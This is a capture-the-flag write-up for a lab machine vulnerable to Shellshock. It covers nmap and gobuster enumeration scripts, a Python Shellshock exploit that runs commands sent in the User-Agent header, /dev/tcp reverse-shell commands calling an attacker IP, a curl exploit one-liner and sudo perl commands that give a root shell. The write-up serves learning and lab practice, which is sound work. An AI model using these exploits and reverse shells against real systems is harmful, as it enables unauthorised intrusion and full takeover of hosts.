Enumeration
I am using my own bash script to do a more efficient nmap scan.
Here’s the simple bash script:
#!/bin/bash
# Two-pass scan: a fast sweep of all 65535 TCP ports first, then default scripts
# and version detection only against the ports that came back open.
if [ $# -lt 2 ]; then
    echo "Usage: $0 <target_ip> <output_file>"
    exit 1
fi
# keep only the "NNN/tcp open ..." lines and join the port numbers with commas
ports=$(nmap -T4 --min-rate=1000 -p- "$1" | grep -e '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
if [ -z "$ports" ]; then
    echo "No open TCP ports found on $1"
    exit 1
fi
nmap -sC -sV -p "$ports" -vvv "$1" -oN "$2"
sh ~/tools/scan.sh 10.10.10.56 shocker1.txt
Running this script produces shocker1.txt, which contains the scan result:
Nmap 7.91 scan initiated Tue Dec 8 23:55:22 2020 as: nmap -sC -sV -p 80,2222 -vvv -oN shocker1.txt 10.10.10.56
Nmap scan report for 10.10.10.56
Host is up, received syn-ack (0.0061s latency).
Scanned at 2020-12-08 23:55:22 +08 for 6s
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQD8ArTOHWzqhwcyAZWc2CmxfLmVVTwfLZf0zhCBREGCpS2WC3NhAKQ2zefCHCU8XTC8hY9ta5ocU+p7S52OGHlaG7HuA5Xlnihl1INNsMX7gpNcfQEYnyby+hjHWPLo4++fAyO/lB8NammyA13MzvJy8pxvB9gmCJhVPaFzG5yX6Ly8OIsvVDk+qVa5eLCIua1E7WGACUlmkEGljDvzOaBdogMQZ8TGBTqNZbShnFH1WsUxBtJNRtYfeeGjztKTQqqj4WD5atU8dqV/iwmTylpE7wdHZ+38ckuYL9dmUPLh4Li2ZgdY6XniVOBGthY5a2uJ2OFp2xe1WS9KvbYjJ/tH
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPiFJd2F35NPKIQxKMHrgPzVzoNHOJtTtM+zlwVfxzvcXPFFuQrOL7X6Mi9YQF9QRVJpwtmV9KAtWltmk3qm4oc=
| 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC/RjKhT/2YPlCgFQLx+gOXhC6W3A3raTzjlXQMT8Msk
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done at Tue Dec 8 23:55:28 2020 -- 1 IP address (1 host up) scanned in 6.87 seconds
The non-standard port tcp/2222, running OpenSSH 7.2p2, is a rabbit hole. That version has a timing-based user enumeration weakness: an oversized password (50 KB of characters by default) is sent for each name in a user list, and a slower response marks a valid account. Chasing it here is a waste of time and leads nowhere.
Web directories enumeration
To be honest, dirbuster is the better of the two for recursive enumeration, but it is very slow: with my VM's limitations, errors start once dirbuster goes above 50 threads. The other choice is gobuster, which is much quicker than dirbuster but does not enumerate recursively.
Dirbuster's threads work through one extension at a time, whereas gobuster's threads fire requests for every extension at the target at the same time.
With dirbuster, after an hour, an interesting result:
Files found with a 200 response:
/cgi-bin/user.sh
With gobuster I have to do the recursion manually. First the web root:
gobuster dir -u 10.10.10.56 -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 50 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0' -x .php,.txt,.sh,.htm,.html,.jsp
Then the directory it finds:
gobuster dir -u 10.10.10.56/cgi-bin -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 50 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0' -x .php,.txt,.sh,.htm,.html,.jsp
The entire process took three minutes.
A script wrapper is needed to use gobuster for recursive scans.
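One such wrapper, as an added example (my own code, not the writeup's): it drives gobuster from Python and re-runs it inside every directory gobuster reports. It assumes Apache's habit of answering a directory requested without its trailing slash with a 301 redirect (so a 301 hit is a directory and a 200 hit is a file), gobuster's default output format where each hit is printed as a path relative to the scanned URL, and the wordlist, extension and user-agent settings from the commands above. The `runner` parameter is only there so the recursion logic can be exercised without gobuster installed.

```python
#!/usr/bin/env python3
"""Recursive gobuster wrapper (added example, not from the original writeup)."""
import re
import subprocess
import sys

WORDLIST = "/usr/share/seclists/Discovery/Web-Content/common.txt"
EXTENSIONS = "php,txt,sh,htm,html,jsp"
USER_AGENT = "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"

# gobuster prints one hit per line, relative to the URL it was given, e.g.
#   /cgi-bin             (Status: 301) [Size: 312] [--> http://10.10.10.56/cgi-bin/]
#   /user.sh             (Status: 200) [Size: 118]
HIT_RE = re.compile(r"^(?P<path>/\S+)\s+\(Status:\s*(?P<status>\d{3})\)")


def parse_hits(output):
    """Return (path, status) tuples for every hit line in gobuster's stdout."""
    hits = []
    for line in output.splitlines():
        m = HIT_RE.match(line.strip())
        if m:
            hits.append((m.group("path"), int(m.group("status"))))
    return hits


def directories(hits):
    """Pick the hits worth recursing into. Assumption: Apache redirects a
    directory requested without its trailing slash (301), while files answer 200."""
    return [p.rstrip("/") for p, status in hits if status == 301 or p.endswith("/")]


def gobuster_cmd(url):
    # -q suppresses the banner so only hit lines (and nothing else) land on stdout
    return ["gobuster", "dir", "-q", "-u", url, "-w", WORDLIST, "-t", "50",
            "-a", USER_AGENT, "-x", EXTENSIONS]


def run_gobuster(url):
    """Real runner: invoke gobuster and hand back its stdout."""
    proc = subprocess.run(gobuster_cmd(url), capture_output=True, text=True)
    return proc.stdout


def recursive_scan(base_url, max_depth=3, runner=run_gobuster):
    """Breadth-first recursion over the directories gobuster finds.
    Returns {scanned_url: [(path, status), ...]}; every URL is scanned once."""
    base_url = base_url.rstrip("/")
    results = {}
    queue = [(base_url, 0)]
    while queue:
        url, depth = queue.pop(0)
        if url in results:
            continue
        hits = parse_hits(runner(url))
        results[url] = hits
        if depth >= max_depth:
            continue
        for sub in directories(hits):
            if sub:  # "" would be the root itself; never requeue it
                queue.append((url + sub, depth + 1))
    return results


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "http://10.10.10.56"
    for url, hits in recursive_scan(target).items():
        for path, status in hits:
            print(f"{url}{path} (Status: {status})")
```

Run it as `python3 rgobuster.py http://10.10.10.56`; `max_depth` caps how far it descends so a redirect loop or a very deep tree cannot keep it busy forever.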

Shellshock exploit
I first came across Shellshock when doing this machine. I used the test method from this post: https://www.surevine.com/shellshocked-a-quick-demo-of-how-easy-it-is-to-exploit/ and the target tested positive.
I wrote myself a simple Python script so I can send commands more conveniently than with curl.
import requests

# exploit based on https://www.surevine.com/shellshocked-a-quick-demo-of-how-easy-it-is-to-exploit/
# "() { :; };" is what a vulnerable bash parses as a function definition before
# continuing to execute the rest of the value; the two echos emit a header line and
# a blank line so Apache sees a valid CGI response instead of returning a 500.
base_header = """() { :; }; echo Content-Type: text/html; echo ;"""
base_path = input("Address of the shellshock vuln webapp: ")
vuln_file = input("File found under /cgi-bin/ which is executable: ")
url = f"http://{base_path}/cgi-bin/{vuln_file}"
print("Command example /bin/bash -i > /dev/tcp/192.168.10.1/53 0<&1 2>&1")
print("Another command example: /bin/cat /etc/passwd")
try:
    while True:
        cmd_string = input("Enter command string similar to the examples shown: ")
        # the payload rides in User-Agent, which mod_cgi exports as HTTP_USER_AGENT
        response = requests.post(url, headers={"User-agent": f"{base_header}{cmd_string}"})
        print(response.text)
except KeyboardInterrupt:
    print("Bye!")

Get a foothold and get user’s flag
Since the exploit has been verified to work, I set up a netcat listener and wait for the reverse connection.
The Shocker machine has no netcat, so I redirect an interactive bash into /dev/tcp instead. With my script still running, I type in:
/bin/bash -i > /dev/tcp/10.10.14.15/53 0<&1 2>&1

The equivalent with curl (any header name works, since the CGI handler exports every request header into the environment):
curl -v 10.10.10.56/cgi-bin/user.sh -H "custom:() { ignored; }; echo Content-Type: text/html; echo; /bin/bash -i > /dev/tcp/10.10.14.15/53 0<&1 2>&1"
Privilege escalation and obtain root.txt

I first used a roundabout method: load the POSIX module, setuid to root, then exec bash as root.
sudo /usr/bin/perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'
Since the user can already run perl as root through sudo, the setuid call is unnecessary, so this makes more sense:
sudo /usr/bin/perl -e 'exec "/bin/bash -i";'

References:
https://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/
https://www.surevine.com/shellshocked-a-quick-demo-of-how-easy-it-is-to-exploit/
https://github.com/francisck/shellshock-cgi/blob/master/shellshock_cgi.py